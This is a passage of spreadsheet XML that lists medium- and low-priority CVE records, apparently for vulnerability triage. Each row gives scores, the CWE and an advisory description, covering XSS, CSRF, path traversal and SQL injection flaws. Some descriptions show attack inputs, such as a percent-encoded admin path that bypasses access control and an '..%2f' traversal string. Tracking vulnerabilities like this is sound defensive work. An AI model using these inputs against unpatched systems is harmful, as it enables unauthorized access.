          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79418</t>
        </is>
      </c>
      <c r="C2016" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2016" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2016" s="5" t="inlineStr"/>
      <c r="F2016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2016" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2016" s="5" t="inlineStr"/>
      <c r="I2016" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2016" s="5" t="inlineStr"/>
      <c r="K2016" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2016" s="5" t="inlineStr">
        <is>
          <t>EMX Tecnologia Gestao X version &lt;= 8.4 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Help Chat functionality. Improper neutralization of user-controlled input during web page generation allows authenticated attackers to execute arbitrary JavaScript in the context of other authenticated users, potentially resulting in session hijacking, account takeover, and unauthorized actions.</t>
        </is>
      </c>
      <c r="M2016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79418</t>
        </is>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79905</t>
        </is>
      </c>
      <c r="C2017" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2017" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2017" s="5" t="inlineStr"/>
      <c r="F2017" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2017" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2017" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2017" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2017" s="5" t="inlineStr"/>
      <c r="K2017" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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2017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t>
        </is>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81890</t>
        </is>
      </c>
      <c r="C2018" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2018" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2018" s="5" t="inlineStr"/>
      <c r="F2018" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2018" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2018" s="5" t="inlineStr"/>
      <c r="I2018" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2018" s="5" t="inlineStr"/>
      <c r="K2018" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2018" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, the netmount command is omitted from elFinderConnector::$csrfProtectedCmds in php/elFinderConnector.class.php, so validateCsrfToken() is not called for this state-changing operation. In the shipped php/connector.minimal.php-dist configuration, FTP network mounts are enabled by default, and attacker-controlled protocol, host, path, port, user, pass, alias, and options arguments flow through elFinder::netmount() in php/elFinder.class.php to php/elFinderVolumeFTP.class.php. A cross-site request can therefore persist an attacker-chosen FTP mount in the victim's session, cause the PHP server to connect to an attacker-chosen FTP host and port, and send supplied credentials without an X-elFinder-CSRF token. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M2018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81890</t>
        </is>
      </c>
    </row>
    <row r="2019">
      <c r="A2019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82396</t>
        </is>
      </c>
      <c r="C2019" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2019" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2019" s="5" t="inlineStr"/>
      <c r="F2019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2019" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2019" s="5" t="inlineStr"/>
      <c r="I2019" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2019" s="5" t="inlineStr"/>
      <c r="K2019" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2019" s="5" t="inlineStr">
        <is>
          <t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php allows the /media/{id}/download/{slug} route and its administration variant to honor the inline query parameter for scriptable MIME types. The vulnerable stored Content-Type values include text/html, application/xhtml+xml, text/xml, and application/xml. An attacker with media upload permission can store an HTML, XHTML, or XML document and create a link using inline=1, causing the application to return the file on the Sulu origin instead of forcing Content-Disposition attachment. When an authenticated victim opens the link, attacker-controlled JavaScript can execute with the victim's Sulu-origin session and can read data or perform actions as that victim. This issue is fixed in versions 2.6.25 and 3.0.8.</t>
        </is>
      </c>
      <c r="M2019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82396</t>
        </is>
      </c>
    </row>
    <row r="2020">
      <c r="A2020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84371</t>
        </is>
      </c>
      <c r="C2020" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2020" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2020" s="5" t="inlineStr"/>
      <c r="F2020" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2020" s="5" t="inlineStr">
        <is>
          <t>sap, node.js</t>
        </is>
      </c>
      <c r="H2020" s="5" t="inlineStr"/>
      <c r="I2020" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2020" s="5" t="inlineStr"/>
      <c r="K2020" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2020" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. From version 1.9.0 until version 2.17.7, packages/sanitize-html/index.js validates an animation value attribute as one flat URL and does not recognize that attributeName selecting href or xlink:href gives the sibling values, from, to, or by attribute SVG SMIL URL semantics. In configurations that allow the animate, animateColor, animateMotion, animateTransform, or set elements, a values list can begin with a safe fragment and contain a later executable destination that survives allowedSchemesAppliedToAttributes checking. When the sanitized SVG is rendered, the browser can copy that later destination into the live link, and a victim who activates the link can execute script in the application's origin. This issue is fixed in version 2.17.7.</t>
        </is>
      </c>
      <c r="M2020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84371</t>
        </is>
      </c>
    </row>
    <row r="2021">
      <c r="A2021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84385</t>
        </is>
      </c>
      <c r="C2021" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2021" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2021" s="5" t="inlineStr"/>
      <c r="F2021" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2021" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2021" s="5" t="inlineStr"/>
      <c r="I2021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2021" s="5" t="inlineStr"/>
      <c r="K2021" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2021" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.6, FortiSOAR PaaS 7.5.0 through 7.5.3, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.6, FortiSOAR on-premise 7.5.0 through 7.5.3, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to escalation of privilege via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t>
        </is>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87653</t>
        </is>
      </c>
      <c r="C2022" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2022" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2022" s="5" t="inlineStr"/>
      <c r="F2022" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2022" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2022" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I2022" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2022" s="5" t="inlineStr"/>
      <c r="K2022" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L2022" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FullScreen in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M2022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87653</t>
        </is>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14350</t>
        </is>
      </c>
      <c r="C2023" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2023" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2023" s="5" t="inlineStr"/>
      <c r="F2023" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2023" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2023" s="5" t="inlineStr"/>
      <c r="I2023" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2023" s="5" t="inlineStr"/>
      <c r="K2023" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L2023" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Data System 11.3.0.2 through Interim Fix 001 could allow an unauthorized user to inject data into log messages due to improper neutralization of special elements when written to log files.</t>
        </is>
      </c>
      <c r="M2023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14350</t>
        </is>
      </c>
    </row>
    <row r="2024">
      <c r="A2024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16660</t>
        </is>
      </c>
      <c r="C2024" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2024" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2024" s="5" t="inlineStr"/>
      <c r="F2024" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2024" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2024" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I2024" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2024" s="5" t="inlineStr"/>
      <c r="K2024" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2024" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a remote attacker to cause a denial of service due to an out-of-bounds read.</t>
        </is>
      </c>
      <c r="M2024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16660</t>
        </is>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="C2025" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2025" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2025" s="5" t="inlineStr"/>
      <c r="F2025" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2025" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2025" s="5" t="inlineStr"/>
      <c r="I2025" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2025" s="5" t="inlineStr"/>
      <c r="K2025" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-610</t>
        </is>
      </c>
      <c r="L2025" s="5" t="inlineStr">
        <is>
          <t>jackson-databind's deserializer for java.nio.file.Path resolves an attacker-supplied URI without restricting the URI scheme. In JDKFromStringDeserializer.NioPathHelper.deserialize, a string bound from untrusted JSON is passed to new URI(value) and then to Path.of(uri). When that throws FileSystemNotFoundException, the code enumerates ServiceLoader&lt;FileSystemProvider&gt; and calls provider.getPath(uri) on the first provider whose scheme matches the attacker-chosen scheme. Untrusted JSON can therefore select and drive an arbitrary registered FileSystemProvider during readValue under a default JsonMapper, and forces provider class loading at the same time. With only the JDK built-in providers (file, jar/zipfs) present, the resolved path is inert and no mount or network I/O occurs; further impact requires a side-effecting third-party FileSystemProvider on the classpath. This affects com.fasterxml.jackson.core:jackson-databind from 2.8.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2. Binding java.nio.file.Path from untrusted JSON should be avoided regardless of version.</t>
        </is>
      </c>
      <c r="M2025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19670</t>
        </is>
      </c>
      <c r="C2026" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2026" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2026" s="5" t="inlineStr"/>
      <c r="F2026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2026" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H2026" s="5" t="inlineStr"/>
      <c r="I2026" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2026" s="5" t="inlineStr"/>
      <c r="K2026" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2026" s="5" t="inlineStr">
        <is>
          <t>Malcolm's nginx Lua role-based access control (RBAC) layer decides whether an authenticated user may reach a role-restricted path (e.g. /htadmin, /auth, /admin_login, /arkime/api/esadmin, NetBox, upload endpoints) by pattern-matching the raw, percent-encoded request URI. Nginx itself, however, selects which location block actually serves the request using the percent-decoded, normalized URI. Because the RBAC check never percent-decodes its input, an authenticated low-privilege user can request an admin-only path using percent-encoding (e.g. /%68tadmin.php) and have nginx route it to the restricted location while the Lua RBAC gate evaluating the un-decoded raw string finds no matching restriction and grants access.</t>
        </is>
      </c>
      <c r="M2026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19670</t>
        </is>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41606</t>
        </is>
      </c>
      <c r="C2027" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2027" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2027" s="5" t="inlineStr"/>
      <c r="F2027" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2027" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2027" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2027" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2027" s="5" t="inlineStr"/>
      <c r="K2027" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-674</t>
        </is>
      </c>
      <c r="L2027" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled Recursion vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41606</t>
        </is>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42338</t>
        </is>
      </c>
      <c r="C2028" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2028" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2028" s="5" t="inlineStr"/>
      <c r="F2028" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2028" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2028" s="5" t="inlineStr">
        <is>
          <t>beaugunderson:ip-address</t>
        </is>
      </c>
      <c r="I2028" s="5" t="inlineStr">
        <is>
          <t>2026-05-12</t>
        </is>
      </c>
      <c r="J2028" s="5" t="inlineStr"/>
      <c r="K2028" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2028" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.1.1, Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. This vulnerability is fixed in 10.1.1.</t>
        </is>
      </c>
      <c r="M2028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42338</t>
        </is>
      </c>
    </row>
    <row r="2029">
      <c r="A2029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45292</t>
        </is>
      </c>
      <c r="C2029" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2029" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2029" s="5" t="inlineStr"/>
      <c r="F2029" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2029" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2029" s="5" t="inlineStr"/>
      <c r="I2029" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2029" s="5" t="inlineStr"/>
      <c r="K2029" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2029" s="5" t="inlineStr">
        <is>
          <t>opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0.</t>
        </is>
      </c>
      <c r="M2029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45292</t>
        </is>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47680</t>
        </is>
      </c>
      <c r="C2030" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2030" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2030" s="5" t="inlineStr"/>
      <c r="F2030" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2030" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2030" s="5" t="inlineStr"/>
      <c r="I2030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2030" s="5" t="inlineStr"/>
      <c r="K2030" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2030" s="5" t="inlineStr">
        <is>
          <t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t>
        </is>
      </c>
      <c r="M2030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t>
        </is>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48094</t>
        </is>
      </c>
      <c r="C2031" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2031" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2031" s="5" t="inlineStr"/>
      <c r="F2031" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2031" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2031" s="5" t="inlineStr"/>
      <c r="I2031" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2031" s="5" t="inlineStr"/>
      <c r="K2031" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2031" s="5" t="inlineStr">
        <is>
          <t>The ShareOpenly WordPress plugin prior to version 1.2.1 contains a Cross-Site Scripting vulnerability caused by the absence of WordPress's `esc_url()` escaping function on the `$url` variable before it is rendered into HTML content. This variable is constructed from `home_url( add_query_arg( array(), $wp-&gt;request ) )` and is concatenated directly into an HTML `href` attribute on every singular post or page where the plugin's sharing link is displayed. WordPress's security handbook mandates that every URL placed in HTML output must be passed through `esc_url()`, which both HTML-encodes special characters (converting `"`, `&lt;`, `&gt;` into their safe HTML entity equivalents) and strips dangerous URI schemes such as `javascript:` and `data:`. The omission of this function means that if the `$url` value ever contains HTML-special characters or a dangerous URI scheme — through a `home_url` WordPress filter applied by another plugin or theme, through certain web server or hosting configurations, or through future code changes — the unescaped content will be injected verbatim into the rendered HTML of every post or page on the site. Version 1.2.1 contains a patch for the issue.</t>
        </is>
      </c>
      <c r="M2031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48094</t>
        </is>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48796</t>
        </is>
      </c>
      <c r="C2032" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2032" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2032" s="5" t="inlineStr"/>
      <c r="F2032" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2032" s="5" t="inlineStr">
        <is>
          <t>windows, .net</t>
        </is>
      </c>
      <c r="H2032" s="5" t="inlineStr"/>
      <c r="I2032" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2032" s="5" t="inlineStr"/>
      <c r="K2032" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2032" s="5" t="inlineStr">
        <is>
          <t>CefSharp provides .NET bindings for the Chromium Embedded Framework for Windows Forms and Windows Presentation Foundation applications. Prior to version 148.0.90, CefSharp/SchemeHandler/FolderSchemeHandlerFactory.cs used filePath.StartsWith(rootFolder, StringComparison.OrdinalIgnoreCase) to decide whether a decoded and canonicalized request path remained inside rootFolder. That raw prefix test did not enforce a directory boundary, so a request such as ..%2fwww2/secret.txt could escape a configured www directory into a sibling www2 directory whose path shared the same string prefix. Applications that register FolderSchemeHandlerFactory for a custom scheme or an HTTP or HTTPS scheme can therefore serve local files outside the intended root when an attacker can cause the embedded browser to request the crafted URL. The issue affects both Unix-style paths such as /tmp/app/www2 and Windows paths such as C:\app\www2, and the fix appends a directory separator to the normalized root before comparison while rejecting null bytes and alternate data stream syntax. This issue is fixed in version 148.0.90.</t>
        </is>
      </c>
      <c r="M2032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48796</t>
        </is>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49392</t>
        </is>
      </c>
      <c r="C2033" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2033" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2033" s="5" t="inlineStr"/>
      <c r="F2033" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2033" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2033" s="5" t="inlineStr"/>
      <c r="I2033" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2033" s="5" t="inlineStr"/>
      <c r="K2033" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-89</t>
        </is>
      </c>
      <c r="L2033" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.6.0 until 4.14.6 and 5.0.0-beta3, DB::getFile() and DB::searchFile() in src/syscheckd/src/db/src/file.cpp concatenate a monitored file path into SQLite row filters. On non-Windows systems, FIMDBCreator::encodeString() does not escape the value. A local user who can create a filename in a File Integrity Monitoring directory can inject a UNION SELECT expression when wazuh-syscheckd processes or deletes that path. The confirmed primitive manipulates SELECT result sets consumed by the FIM code; stacked statements and remote code execution were not demonstrated. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M2033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49392</t>
        </is>
      </c>
    </row>
    <row r="2034">
